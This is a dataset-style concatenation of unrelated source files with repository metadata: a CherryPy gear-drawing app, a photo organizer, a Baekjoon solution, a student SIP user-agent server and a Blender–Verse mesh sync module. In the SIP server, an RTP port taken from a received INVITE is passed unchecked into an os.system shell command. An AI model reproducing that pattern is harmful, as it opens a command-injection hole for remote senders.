print("rp:", rp)
print("rb:", rb)
# Draw the rb circle (base circle); the circle-drawing function is not defined yet
#create_oval(midx-rb, midy-rb, midx+rb, midy+rb, width=1)
# rd is the root-circle (dedendum) radius
rd=rp-d
# when rd is greater than rb
print("rd:", rd)
# Draw the rd circle (root circle); the circle-drawing function is not defined yet
#create_oval(midx-rd, midy-rd, midx+rd, midy+rd, width=1)
# dr is the radius increment per step when the base-to-tip span is split into imax segments
# the arc is split into imax segments to draw the involute
dr=(ra-rb)/imax
# tan(20*deg)-20*deg is the involute function
sigma=pi/(2*n)+tan('''+str(P)+'''*deg)-'''+str(P)+'''*deg
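# pi/(2*n) is half of the tooth's angular thickness at the pitch circle;
# tan(P*deg)-P*deg is the involute function inv(P), which offsets the
# involute's start angle from the tooth centerline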
for j in range(n):
ang=-2.*j*pi/n+sigma
ang2=2.*j*pi/n+sigma
lxd=midx+rd*sin(ang2-2.*pi/n)
lyd=midy-rd*cos(ang2-2.*pi/n)
#for(i=0;i<=imax;i++):
for i in range(imax+1):
r=rb+i*dr
theta=sqrt((r*r)/(rb*rb)-1.)
alpha=theta-atan(theta)
xpt=r*sin(alpha-ang)
ypt=r*cos(alpha-ang)
xd=rd*sin(-ang)
yd=rd*cos(-ang)
# when i=0, the line starts from the point on the root circle
if(i==0):
last_x = midx+xd
last_y = midy-yd
# starting from the left root circle: except the first point (xd,yd) on the root circle, the (xpt,ypt) points are segment points on the involute
create_line((midx+xpt),(midy-ypt),(last_x),(last_y),fill=顏色)
# the last point lies on the tip circle
if(i==imax):
lfx=midx+xpt
lfy=midy-ypt
last_x = midx+xpt
last_y = midy-ypt
# the line from the last end-of-dedendum point to the recent
# end-of-dedendum point
# lxd is the left-side x coordinate on the root circle, lyd the y coordinate
# the following straight line approximates the arc on the root circle
create_line((lxd),(lyd),(midx+xd),(midy-yd),fill=顏色)
#for(i=0;i<=imax;i++):
for i in range(imax+1):
r=rb+i*dr
theta=sqrt((r*r)/(rb*rb)-1.)
alpha=theta-atan(theta)
xpt=r*sin(ang2-alpha)
ypt=r*cos(ang2-alpha)
xd=rd*sin(ang2)
yd=rd*cos(ang2)
# when i=0, the line starts from the point on the root circle
if(i==0):
last_x = midx+xd
last_y = midy-yd
# starting from the right root circle: except the first point (xd,yd) on the root circle, the (xpt,ypt) points are segment points on the involute
create_line((midx+xpt),(midy-ypt),(last_x),(last_y),fill=顏色)
# the last point lies on the tip circle
if(i==imax):
rfx=midx+xpt
rfy=midy-ypt
last_x = midx+xpt
last_y = midy-ypt
# lfx is the left-side x coordinate on the tip circle, lfy the y coordinate
# the following straight line approximates the arc on the tip circle
create_line(lfx,lfy,rfx,rfy,fill=顏色)
齒輪(500,500,'''+str(D)+''','''+str(N)+''',"blue")
</script>
<canvas id="plotarea" width="2000" height="1000"></canvas>
</body>
</html>
<a href='index'>Back to previous page</a>
'''
return outstring
#@+node:2015.20150331094055.1737: *3* my3Dgeartest
@cherrypy.expose
# N is the number of teeth, M is the module, P is the pressure angle
def my3Dgeartest(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- load brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- start brython() -->
<body onload="brython()">
<!-- canvas drawing program below -->
<script type="text/python">
# import document from browser
from browser import document
from math import *
# prepare to draw on the canvas with id="plotarea"
canvas = document["plotarea"]
ctx = canvas.getContext("2d")
def create_line(x1, y1, x2, y2, width=3, fill="red"):
ctx.beginPath()
ctx.lineWidth = width
ctx.moveTo(x1, y1)
ctx.lineTo(x2, y2)
ctx.strokeStyle = fill
ctx.stroke()
# After importing the math functions, the circle ratio is pi
# deg is the degree-to-radian conversion factor
deg = pi/180.
#
# Below are the spur-gear drawing and the main tkinter canvas drawing
#
# Define a drawing function for a spur gear
# midx is the x coordinate of the gear center
# midy is the y coordinate of the gear center
# rp is the pitch-circle radius, n is the number of teeth
def 齒輪(midx, midy, rp, n, 顏色):
# Make the angle conversion factor a global variable
global deg
# The gear involute is drawn as 15 line segments
imax = 15
# Draw a straight line on the given canvas, from the center to the top of the pitch circle on the y axis
create_line(midx, midy, midx, midy-rp)
# Draw the rp circle; the circle-drawing function is not defined yet
#create_oval(midx-rp, midy-rp, midx+rp, midy+rp, width=2)
# a is the module (the metric tooth size); the module is the pitch diameter divided by the number of teeth
# the module also equals the addendum height
a=2*rp/n
# d is the dedendum, 1.157 or 1.25 times the module; 1.25 is used here
d=2.5*rp/n
# ra is the outer (tip) radius of the gear
ra=rp+a
print("ra:", ra)
# Draw the ra circle; the circle-drawing function is not defined yet
#create_oval(midx-ra, midy-ra, midx+ra, midy+ra, width=1)
# rb is the base-circle radius of the gear
# the base circle is the reference circle from which the involute teeth grow
rb=rp*cos(20*deg)
print("rp:", rp)
print("rb:", rb)
# Draw the rb circle (base circle); the circle-drawing function is not defined yet
#create_oval(midx-rb, midy-rb, midx+rb, midy+rb, width=1)
# rd is the root-circle (dedendum) radius
rd=rp-d
# when rd is greater than rb
print("rd:", rd)
# Draw the rd circle (root circle); the circle-drawing function is not defined yet
#create_oval(midx-rd, midy-rd, midx+rd, midy+rd, width=1)
# dr is the radius increment per step when the base-to-tip span is split into imax segments
# the arc is split into imax segments to draw the involute
dr=(ra-rb)/imax
# tan(20*deg)-20*deg is the involute function
sigma=pi/(2*n)+tan(20*deg)-20*deg
for j in range(n):
ang=-2.*j*pi/n+sigma
ang2=2.*j*pi/n+sigma
lxd=midx+rd*sin(ang2-2.*pi/n)
lyd=midy-rd*cos(ang2-2.*pi/n)
#for(i=0;i<=imax;i++):
for i in range(imax+1):
r=rb+i*dr
theta=sqrt((r*r)/(rb*rb)-1.)
alpha=theta-atan(theta)
xpt=r*sin(alpha-ang)
ypt=r*cos(alpha-ang)
xd=rd*sin(-ang)
yd=rd*cos(-ang)
# when i=0, the line starts from the point on the root circle
if(i==0):
last_x = midx+xd
last_y = midy-yd
# starting from the left root circle: except the first point (xd,yd) on the root circle, the (xpt,ypt) points are segment points on the involute
create_line((midx+xpt),(midy-ypt),(last_x),(last_y),fill=顏色)
# the last point lies on the tip circle
if(i==imax):
lfx=midx+xpt
lfy=midy-ypt
last_x = midx+xpt
last_y = midy-ypt
# the line from the last end-of-dedendum point to the recent
# end-of-dedendum point
# lxd is the left-side x coordinate on the root circle, lyd the y coordinate
# the following straight line approximates the arc on the root circle
create_line((lxd),(lyd),(midx+xd),(midy-yd),fill=顏色)
#for(i=0;i<=imax;i++):
for i in range(imax+1):
r=rb+i*dr
theta=sqrt((r*r)/(rb*rb)-1.)
alpha=theta-atan(theta)
xpt=r*sin(ang2-alpha)
ypt=r*cos(ang2-alpha)
xd=rd*sin(ang2)
yd=rd*cos(ang2)
# when i=0, the line starts from the point on the root circle
if(i==0):
last_x = midx+xd
last_y = midy-yd
# starting from the right root circle: except the first point (xd,yd) on the root circle, the (xpt,ypt) points are segment points on the involute
create_line((midx+xpt),(midy-ypt),(last_x),(last_y),fill=顏色)
# the last point lies on the tip circle
if(i==imax):
rfx=midx+xpt
rfy=midy-ypt
last_x = midx+xpt
last_y = midy-ypt
# lfx is the left-side x coordinate on the tip circle, lfy the y coordinate
# the following straight line approximates the arc on the tip circle
create_line(lfx,lfy,rfx,rfy,fill=顏色)
齒輪(400,400,300,41,"blue")
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
</body>
</html>
'''
return outstring
#@+node:2014fall.20141215194146.1793: *3* doCheck
@cherrypy.expose
def doCheck(self, guess=None):
# If the user runs doCheck directly, redirect back to the root method
if guess is None:
raise cherrypy.HTTPRedirect("/")
# Fetch the answer from the session, handling the case where doCheck is run directly and no session value can be read
try:
theanswer = int(cherrypy.session.get('answer'))
except:
raise cherrypy.HTTPRedirect("/")
# The guess obtained from the form is of string type
try:
theguess = int(guess)
except:
return "error " + self.guessform()
# Each run of doCheck increments the count once
cherrypy.session['count'] += 1
# Compare the answer with the guessed number
if theanswer < theguess:
return "big " + self.guessform()
elif theanswer > theguess:
return "small " + self.guessform()
else:
# Guessed correctly; fetch the accumulated guess count from the session
thecount = cherrypy.session.get('count')
return "exact: <a href=''>guess again</a>"
#@+node:2014fall.20141215194146.1789: *3* guessform
def guessform(self):
# Print the hypertext form for user input
outstring = str(cherrypy.session.get('answer')) + "/" + str(cherrypy.session.get('count')) + '''<form method=POST action=doCheck>
Enter the integer you guessed: <input type=text name=guess><br />
<input type=submit value=send>
</form>'''
return outstring
#@-others
#@-others
################# (4) Program startup section
# Configure static directories or static files relative to the program's directory
application_conf = {'/static':{
'tools.staticdir.on': True,
# a static directory must be created manually under the program's execution directory
'tools.staticdir.dir': _curdir+"/static"},
'/downloads':{
'tools.staticdir.on': True,
'tools.staticdir.dir': data_dir+"/downloads"},
'/images':{
'tools.staticdir.on': True,
'tools.staticdir.dir': data_dir+"/images"}
}
root = Hello()
root.gear = gear.Gear()
if 'OPENSHIFT_REPO_DIR' in os.environ.keys():
# Running on OpenShift
application = cherrypy.Application(root, config=application_conf)
else:
# Running locally
cherrypy.quickstart(root, config=application_conf)
#@-leo
|
2014cdbg4/2015cd_midterm
|
wsgi.py
|
Python
|
gpl-2.0
| 26,299
|
## batchprocess.py
from modules.FileProcess import batchprocess
def _archlinux_():
# Source folder, this one will be walked recursively in search of your files
sInd = "/media/BLACK/Work/PersonalMedia/FotosWork/src"
# Target folder where the pictures will be copied, renamed, and organized.
# Current Pattern: ./[Year]/[Month]/[Day]/[Year-Month-Day]/[HH.MM.SS-Take-Camera].[ext]
sOutd = "/media/BLACK/Work/PersonalMedia/FotosWork/sources"
# This script doesn't remove any file; pictures that were copied successfully to the target folder are moved here.
# Files not in the extensions list, or already present in the target folder, are left in the source folder.
sProcd = "/media/BLACK/Work/PersonalMedia/FotosWork/proc"
# list of search extensions.
lext = [".jpg",".jpeg",".jpe",".tif",".nef",".cr2",".psd",".png",".gif"]
# launch command
batchprocess(sInd,sOutd,sProcd,lext)
## test code
if __name__ == "__main__":
_archlinux_()
|
ridlimod/kndMediaOrganizer
|
src/batchprocess.py
|
Python
|
gpl-2.0
| 937
|
"""
2588 : Multiplication (곱셈)
URL : https://www.acmicpc.net/problem/2588
Input :
472
385
Output :
2360
3776
1416
181720
"""
first = int(input())
second = int(input())
print(first * (second % 10))
print(first * ((second % 100) // 10))
print(first * (second // 100))
print(first * second)
|
0x1306e6d/Baekjoon
|
baekjoon/2588.py
|
Python
|
gpl-2.0
| 340
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""USER AGENT SERVER."""
import socket
import socketserver
import sys
import os
from xml.sax import make_parser
from xml.sax.handler import ContentHandler
import time
"""READING AND EXTRACTION OF XML DATA."""
if len(sys.argv) != 2:
sys.exit("Usage: python uaserver.py config")
#FIRST PARAMETER : XML FILE
XML_DATA = sys.argv[1]
class SmallSMILHandler(ContentHandler):
"""CLASE DE LECTURA DE XML."""
def __init__(self):
"""Diccionario xml."""
self.list = []
self.dicc = {"account": ["username", "passwd"],
"uaserver": ["ip", "puerto"],
"rtpaudio": ["puerto"],
"regproxy": ["ip", "puerto"],
"log": ["path"],
"audio": ["path"]}
def startElement(self, name, attrib):
"""Start Element."""
if name in self.dicc:
dicc = {}
for item in self.dicc[name]:
dicc[item] = attrib.get(item, "")
diccname = {name: dicc}
self.list.append(diccname)
def get_tags(self):
"""Devuelve la lista xml."""
return self.list
parser = make_parser()
cHandler = SmallSMILHandler()
parser.setContentHandler(cHandler)
parser.parse(open(XML_DATA))
data = cHandler.get_tags()
print(data)
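# Illustrative shape of the config XML parsed above (a hedged sketch; tag and
# attribute names follow self.dicc and the positional indexing below, but the
# root tag and all values are made up):
# <config>
#   <account username="alice" passwd="secret"/>
#   <uaserver ip="127.0.0.1" puerto="5060"/>
#   <rtpaudio puerto="23032"/>
#   <regproxy ip="127.0.0.1" puerto="5555"/>
#   <log path="uaserver.log"/>
#   <audio path="song.mp3"/>
# </config>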
'DATA'
#Let's try pulling some values out of the dictionary built from the xml data
ACCOUNT = data[0]['account']
#print("This is account: ", ACCOUNT)
USERNAME = ACCOUNT['username']
#print("This is username:", USERNAME)
UASERVER_PORT = data[1]['uaserver']['puerto']
#print("This is the UAServer listening port:", UASERVER_PORT)
UAS_IP = data[1]['uaserver']['ip']
#print("This is the UASERVER IP address: ", UAS_IP)
RTP_PORT = data[2]['rtpaudio']['puerto']
SONG = data[5]['audio']['path']
LOG_FILE = data[4]['log']['path']
PROXY_PORT = data[3]['regproxy']['puerto']
PROXY_IP = data[3]['regproxy']['ip']
'''LOG'''
fichero = LOG_FILE
fich = open(fichero, 'a')
str_now = time.strftime("%Y%m%d%H%M%S", time.gmtime(time.time()))
class EchoHandler(socketserver.DatagramRequestHandler):
"""Echo."""
PORT_RTP = []
def handle(self):
u"""Escribe dirección y puerto cliente (tupla client_address)."""
while 1:
# Leyendo línea a línea lo que nos envía el cliente
text = self.rfile.read()
line = self.rfile.read()
print("Proxy manda cliente: ")
print(text.decode('utf-8'))
LINE = text.decode('utf-8')
REQUESTS = ['INVITE', 'ACK', 'BYE']
Words_LINES = LINE.split()
print("Esta es la linea que me envia el proxy", Words_LINES)
REQUEST = Words_LINES[0]
#PORT_RTP = []
if REQUEST == 'INVITE':
RTP_PORT_RECEIVE = Words_LINES[11]
self.PORT_RTP.append(RTP_PORT_RECEIVE)
#We have appended the port to a list
print("FRESHLY BUILT LIST", self.PORT_RTP)
print("RTP port the client sends us in the INVITE: ")
print(RTP_PORT_RECEIVE)
if REQUEST not in REQUESTS:
LINE_405 = 'SIP/2.0 405 Method Not Allowed\r\n\r\n'
self.wfile.write(bytes(LINE_405, 'utf-8'))
if REQUEST == 'INVITE':
'''LOG'''
datos_log1 = str_now + " Received from "
datos_log1 += self.client_address[0] + ":"
datos_log1 += str(self.client_address[1])
datos_log1 += " " + LINE.replace("\r\n", " ") + "\r\n"
fich.write(datos_log1)
answer = "SIP/2.0 100 Trying\r\n\r\n"
answer += "SIP/2.0 180 Ring\r\n\r\n"
answer += "SIP/2.0 200 OK\r\n\r\n"
answer += "Content-Type: application/sdp\r\n\r\n"
answer += "v=0\r\n" + "o=" + USERNAME + " "
answer += UAS_IP + " \r\n" + "s=SesionGhibli\r\n"
answer += "t=0\r\n" + "m=audio " + RTP_PORT
answer += " RTP\r\n\r\n"
self.wfile.write(bytes(answer, 'utf-8'))
'''LOG'''
datos_log2 = str_now + " Sent to " + PROXY_IP + ":"
datos_log2 += PROXY_PORT + " "
datos_log2 += answer.replace("\r\n", " ") + "\r\n"
fich.write(datos_log2)
elif REQUEST == 'ACK':
'''LOG'''
datos_log1 = str_now + " Received from "
datos_log1 += self.client_address[0] + ":"
datos_log1 += str(self.client_address[1])
datos_log1 += " " + LINE.replace("\r\n", " ") + "\r\n"
fich.write(datos_log1)
#print("imprimiendo la lista inventada", self.PORT_RTP)
PUERTO = self.PORT_RTP[0]
print("Reproduciendo")
aEjecutar = './mp32rtp -i 127.0.0.1 -p ' + PUERTO + ' < '
aEjecutar += SONG
#aEjecutar = "./mp32rtp -i " + DIR_DEST + " -p " + PUERTO
#aEjecutar += " < " + SONG
os.system(aEjecutar)
print('End')
#print("ENVIANDO AUDIO RTP IMAGINARIO AL PUERTO: ", PUERTO)
elif REQUEST == 'BYE':
'''LOG'''
datos_log1 = str_now + " Received from "
datos_log1 += PROXY_IP + ":"
datos_log1 += str(self.client_address[1])
datos_log1 += " " + LINE.replace("\r\n", " ") + "\r\n"
fich.write(datos_log1)
self.wfile.write(b"SIP/2.0 200 OK\r\n\r\n")
'''LOG'''
datos_log2 = str_now + " Sent to "
datos_log2 += PROXY_IP + ":" + PROXY_PORT
datos_log2 += " " + "SIP/2.0 200 OK" + "\r\n"
fich.write(datos_log2)
# If there are no more lines, exit the infinite loop
if not line:
break
if __name__ == "__main__":
# Create the echo server and listen
serv = socketserver.UDPServer((UAS_IP, int(UASERVER_PORT)), EchoHandler)
print("Listening...")
try:
serv.serve_forever()
except KeyboardInterrupt:
print("Finalizado servidor")
|
isabelvillaruiz/ptavi-pfinal
|
uaserver.py
|
Python
|
gpl-2.0
| 6,607
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
"""
This module implements sharing Blender meshes at Verse server
"""
import bpy
import blf
import bgl
import mathutils
import bmesh
from bpy_extras.view3d_utils import location_3d_to_region_2d
import verse as vrs
from .vrsent import vrsent
from . import object3d
VERSE_MESH_CT = 126
LAYER_VERTEXES_CT = 0
LAYER_EDGES_CT = 1
LAYER_QUADS_CT = 2
class VerseVertices(vrsent.VerseLayer):
"""
Custom VerseLayer subclass representing position of vertexes
"""
node_custom_type = VERSE_MESH_CT
custom_type = LAYER_VERTEXES_CT
def __init__(self, node, parent_layer=None, layer_id=None, data_type=vrs.VALUE_TYPE_REAL64,
count=3, custom_type=LAYER_VERTEXES_CT):
"""
Constructor of VerseVertices
"""
super(VerseVertices, self).__init__(node, parent_layer, layer_id, data_type, count, custom_type)
self.id_cache = {}
def b3d_vertex(self, item_id):
"""
This method tries to find Blender vertex in bmesh and cache
"""
_bmesh = self.node.bmesh
try:
# Try to find blender vertex at cache first
b3d_vert = self.id_cache[item_id]
except KeyError:
try:
# Then try to find it in bmesh at the index==item_id
b3d_vert = _bmesh.verts[item_id]
except IndexError:
# When vertex was not found in cache nor bmesh, then try to
# find it using loop over all vertices
id_layer = _bmesh.verts.layers.int.get('VertIDs')
for b3d_vert in _bmesh.verts:
verse_id = b3d_vert[id_layer]
if verse_id != -1:
self.id_cache[item_id] = b3d_vert
if verse_id == item_id:
return b3d_vert
return None
else:
# Update cache
self.id_cache[item_id] = b3d_vert
return b3d_vert
else:
return b3d_vert
def get_bmesh(self):
"""
This method tries to update reference on bmesh
"""
if self.node.bmesh is None:
self.node.bmesh = bmesh.new()
self.node.bmesh.from_mesh(self.node.mesh)
self.node.bm_from_edit_mesh = False
else:
try:
self.node.bmesh.verts
except ReferenceError:
self.node.bmesh = bmesh.new()
self.node.bmesh.from_mesh(self.node.mesh)
self.node.clear_ID_cache()
return self.node.bmesh
@classmethod
def cb_receive_layer_set_value(cls, session, node_id, layer_id, item_id, value):
"""
This method is called, when new value of verse layer was set
"""
vert_layer = super(VerseVertices, cls).cb_receive_layer_set_value(session, node_id, layer_id, item_id, value)
# Update mesh only in situation, when it was changed by someone else
if vert_layer.node.locked_by_me is False:
_bmesh = vert_layer.get_bmesh()
b3d_vert = vert_layer.b3d_vertex(item_id)
# Try to update last vertex ID
if vert_layer.node.last_vert_ID is None or \
vert_layer.node.last_vert_ID < item_id:
vert_layer.node.last_vert_ID = item_id
if b3d_vert is not None:
# Update position
b3d_vert.co = mathutils.Vector(value)
else:
# When vertex was not found, then it is new vertex. Create it.
b3d_vert = _bmesh.verts.new(value)
vert_layer.id_cache[item_id] = b3d_vert
id_layer = _bmesh.verts.layers.int.get('VertIDs')
b3d_vert[id_layer] = item_id
# Update Blender mesh
_bmesh.to_mesh(vert_layer.node.mesh)
vert_layer.node.mesh.update()
return vert_layer
@classmethod
def cb_receive_layer_unset_value(cls, session, node_id, layer_id, item_id):
"""
This method is called, when some vertex was deleted
"""
vert_layer = super(VerseVertices, cls).cb_receive_layer_unset_value(session, node_id, layer_id, item_id)
# Update mesh only in situation, when it was changed by someone else
if vert_layer.node.locked_by_me is False:
_bmesh = vert_layer.get_bmesh()
b3d_vert = vert_layer.b3d_vertex(item_id)
# Try to delete vertex
if b3d_vert is not None:
bmesh.ops.delete(_bmesh, geom=[b3d_vert], context=1)
vert_layer.id_cache.pop(item_id)
# Update Blender mesh
_bmesh.to_mesh(vert_layer.node.mesh)
vert_layer.node.mesh.update()
return vert_layer
class VerseEdges(vrsent.VerseLayer):
"""
Custom VerseLayer subclass representing edges (indexes to vertexes)
"""
node_custom_type = VERSE_MESH_CT
custom_type = LAYER_EDGES_CT
def __init__(self, node, parent_layer=None, layer_id=None, data_type=vrs.VALUE_TYPE_UINT32,
count=2, custom_type=LAYER_EDGES_CT):
"""
Constructor of VerseEdges
"""
super(VerseEdges, self).__init__(node, parent_layer, layer_id, data_type, count, custom_type)
self.id_cache = {}
def b3d_edge(self, item_id):
"""
This method tries to find Blender edge in bmesh and cache
"""
_bmesh = self.node.bmesh
try:
# Try to find blender vertex at cache first
b3d_edge = self.id_cache[item_id]
except KeyError:
try:
# Then try to find it in bmesh at the index==item_id
b3d_edge = _bmesh.edges[item_id]
except IndexError:
# When edge was not found in cache nor bmesh, then try to
# find it using loop over all edges
id_layer = _bmesh.edges.layers.int.get('EdgeIDs')
for b3d_edge in _bmesh.edges:
verse_id = b3d_edge[id_layer]
if verse_id != -1:
self.id_cache[item_id] = b3d_edge
if verse_id == item_id:
return b3d_edge
return None
else:
# Update cache
self.id_cache[item_id] = b3d_edge
return b3d_edge
else:
return b3d_edge
@classmethod
def cb_receive_layer_set_value(cls, session, node_id, layer_id, item_id, value):
"""
This method is called, when new value of verse layer was set
"""
edge_layer = super(VerseEdges, cls).cb_receive_layer_set_value(session, node_id, layer_id, item_id, value)
# Update mesh only in situation, when it was changed by someone else
if edge_layer.node.locked_by_me is False:
vert_layer = edge_layer.node.vertices
face_layer = edge_layer.node.quads
if edge_layer.node.bmesh is None:
edge_layer.node.bmesh = bmesh.new()
edge_layer.node.bmesh.from_mesh(edge_layer.node.mesh)
edge_layer.node.bm_from_edit_mesh = False
else:
try:
edge_layer.node.bmesh.edges
except ReferenceError:
edge_layer.node.bmesh = bmesh.new()
edge_layer.node.bmesh.from_mesh(edge_layer.node.mesh)
vert_layer.id_cache = {}
edge_layer.id_cache = {}
face_layer.id_cache = {}
_bmesh = edge_layer.node.bmesh
b3d_edge = edge_layer.b3d_edge(item_id)
# Try to update last vertex ID
if edge_layer.node.last_edge_ID is None or \
edge_layer.node.last_edge_ID < item_id:
edge_layer.node.last_edge_ID = item_id
# Does edge with same id exist?
if b3d_edge is not None:
# Delete edge
try:
_bmesh.edges.remove(b3d_edge)
except ReferenceError:
# Edge was already removed
pass
# Create new edge
b3d_edge = _bmesh.edges.new([vert_layer.b3d_vertex(vert_id) for vert_id in value])
edge_layer.id_cache[item_id] = b3d_edge
id_layer = _bmesh.edges.layers.int.get('EdgeIDs')
b3d_edge[id_layer] = item_id
# Update Blender mesh
_bmesh.to_mesh(edge_layer.node.mesh)
edge_layer.node.mesh.update()
return edge_layer
@classmethod
def cb_receive_layer_unset_value(cls, session, node_id, layer_id, item_id):
"""
This method is called, when some vertex was deleted
"""
edge_layer = super(VerseEdges, cls).cb_receive_layer_unset_value(session, node_id, layer_id, item_id)
# Update mesh only in situation, when it was changed by someone else
if edge_layer.node.locked_by_me is False:
vert_layer = edge_layer.node.vertices
face_layer = edge_layer.node.quads
if edge_layer.node.bmesh is None:
edge_layer.node.bmesh = bmesh.new()
edge_layer.node.bmesh.from_mesh(edge_layer.node.mesh)
edge_layer.node.bm_from_edit_mesh = False
else:
try:
edge_layer.node.bmesh.edges
except ReferenceError:
edge_layer.node.bmesh = bmesh.new()
edge_layer.node.bmesh.from_mesh(edge_layer.node.mesh)
vert_layer.id_cache = {}
edge_layer.id_cache = {}
face_layer.id_cache = {}
_bmesh = edge_layer.node.bmesh
b3d_edge = edge_layer.b3d_edge(item_id)
# Try to update last vertex ID
if edge_layer.node.last_vert_ID is None or \
edge_layer.node.last_edge_ID < item_id:
edge_layer.node.last_edge_ID = item_id
if b3d_edge is not None:
# Delete edge
try:
_bmesh.edges.remove(b3d_edge)
except ReferenceError:
# Edge was already removed?
edge_layer.id_cache.pop(item_id)
else:
# Update Blender mesh
_bmesh.to_mesh(edge_layer.node.mesh)
edge_layer.node.mesh.update()
edge_layer.id_cache.pop(item_id)
return edge_layer
class VerseFaces(vrsent.VerseLayer):
"""
Custom VerseLayer subclass representing tessellated faces (indexes to vertexes).
Tessellated mesh contains only triangles and quads.
"""
node_custom_type = VERSE_MESH_CT
custom_type = LAYER_QUADS_CT
def __init__(self, node, parent_layer=None, layer_id=None, data_type=vrs.VALUE_TYPE_UINT32,
count=4, custom_type=LAYER_QUADS_CT):
"""
Constructor of VerseFaces
"""
super(VerseFaces, self).__init__(node, parent_layer, layer_id, data_type, count, custom_type)
self.id_cache = {}
def find_b3d_face(self, item_id):
"""
This method tries to find Blender vertex in bmesh and cache
"""
_bmesh = self.node.bmesh
try:
# Try to find blender face at cache first
b3d_face = self.id_cache[item_id]
except KeyError:
try:
# Then try to find it in bmesh at the index==item_id
b3d_face = _bmesh.faces[item_id]
except IndexError:
# When face was not found in cache nor bmesh, then try to
# find it using loop over all faces
id_layer = _bmesh.faces.layers.int.get('FaceIDs')
for b3d_face in _bmesh.faces:
verse_id = b3d_face[id_layer]
if verse_id != -1:
self.id_cache[item_id] = b3d_face
if verse_id == item_id:
return b3d_face
return None
else:
# Update cache
self.id_cache[item_id] = b3d_face
return b3d_face
else:
return b3d_face
@classmethod
def cb_receive_layer_set_value(cls, session, node_id, layer_id, item_id, value):
"""
This method is called, when new value of verse layer was set
"""
face_layer = super(VerseFaces, cls).cb_receive_layer_set_value(session, node_id, layer_id, item_id, value)
# Update mesh only in situation, when it was changed by someone else
if face_layer.node.locked_by_me is False:
vert_layer = face_layer.node.vertices
edge_layer = face_layer.node.edges
if face_layer.node.bmesh is None:
face_layer.node.bmesh = bmesh.new()
face_layer.node.bmesh.from_mesh(face_layer.node.mesh)
face_layer.node.bm_from_edit_mesh = False
else:
try:
face_layer.node.bmesh.faces
except ReferenceError:
face_layer.node.bmesh = bmesh.new()
face_layer.node.bmesh.from_mesh(face_layer.node.mesh)
vert_layer.id_cache = {}
edge_layer.id_cache = {}
face_layer.id_cache = {}
_bmesh = face_layer.node.bmesh
b3d_face = face_layer.find_b3d_face(item_id)
# When face already exists, then remove the face
if b3d_face is not None:
try:
_bmesh.faces.remove(b3d_face)
except ReferenceError:
# Face was already removed
pass
# Add new one
if value[3] == 0:
b3d_face = _bmesh.faces.new([vert_layer.b3d_vertex(vert_id) for vert_id in value[0:3]])
else:
b3d_face = _bmesh.faces.new([vert_layer.b3d_vertex(vert_id) for vert_id in value])
# Try to update last face ID
if face_layer.node.last_face_ID is None or \
face_layer.node.last_face_ID < item_id:
face_layer.node.last_face_ID = item_id
face_layer.id_cache[item_id] = b3d_face
id_layer = _bmesh.faces.layers.int.get('FaceIDs')
b3d_face[id_layer] = item_id
# Update Blender mesh
_bmesh.to_mesh(face_layer.node.mesh)
face_layer.node.mesh.update()
return face_layer
@classmethod
def cb_receive_layer_unset_value(cls, session, node_id, layer_id, item_id):
"""
This method is called, when some vertex was deleted
"""
face_layer = super(VerseFaces, cls).cb_receive_layer_unset_value(session, node_id, layer_id, item_id)
# Update mesh only in situation, when it was changed by someone else
if face_layer.node.locked_by_me is False:
vert_layer = face_layer.node.vertices
edge_layer = face_layer.node.edges
if face_layer.node.bmesh is None:
face_layer.node.bmesh = bmesh.new()
face_layer.node.bmesh.from_mesh(face_layer.node.mesh)
face_layer.node.bm_from_edit_mesh = False
else:
try:
face_layer.node.bmesh.faces
except ReferenceError:
face_layer.node.bmesh = bmesh.new()
face_layer.node.bmesh.from_mesh(face_layer.node.mesh)
vert_layer.id_cache = {}
edge_layer.id_cache = {}
face_layer.id_cache = {}
_bmesh = face_layer.node.bmesh
b3d_face = face_layer.find_b3d_face(item_id)
# Remove face
if b3d_face is not None:
try:
_bmesh.faces.remove(b3d_face)
except ReferenceError:
# Face was already removed
face_layer.id_cache.pop(item_id)
else:
# Update Blender mesh
_bmesh.to_mesh(face_layer.node.mesh)
face_layer.node.mesh.update()
# Update id_cache
face_layer.id_cache.pop(item_id)
return face_layer
class VerseMesh(vrsent.VerseNode):
"""
Custom VerseNode subclass representing Blender mesh data structure
"""
custom_type = VERSE_MESH_CT
def __init__(self, session, node_id=None, parent=None, user_id=None, custom_type=VERSE_MESH_CT,
mesh=None, autosubscribe=False):
"""
Constructor of VerseMesh
"""
super(VerseMesh, self).__init__(session, node_id, parent, user_id, custom_type)
self.mesh = mesh
self.vertices = VerseVertices(node=self)
self.edges = VerseEdges(node=self)
self.quads = VerseFaces(node=self)
self._autosubscribe = autosubscribe
self.bmesh = None
self.bm_from_edit_mesh = False
self.cache = None
self.last_vert_ID = None
self.last_edge_ID = None
self.last_face_ID = None
if self.mesh is not None:
# TODO: make the following code work in edit mode too
self.mesh.update(calc_tessface=True)
self.bmesh = bmesh.new()
self.bmesh.from_mesh(self.mesh)
# TODO: do not do it this way for a huge mesh (do not send the whole mesh); use
# vrs.get to get free space in the outgoing queue.
# Send all Vertices
for vert in mesh.vertices:
self.vertices.items[vert.index] = tuple(vert.co)
# Send all Edges
for edge in mesh.edges:
self.edges.items[edge.index] = (edge.vertices[0], edge.vertices[1])
# Send all Faces
for face in mesh.tessfaces:
if len(face.vertices) == 3:
self.quads.items[face.index] = (face.vertices[0], face.vertices[1], face.vertices[2], 0)
else:
self.quads.items[face.index] = tuple(vert for vert in face.vertices)
# Create blender layers storing Verse IDs of vertices, edges and faces
self.last_vert_ID = self.__create_bpy_layer_ids('verts', 'VertIDs')
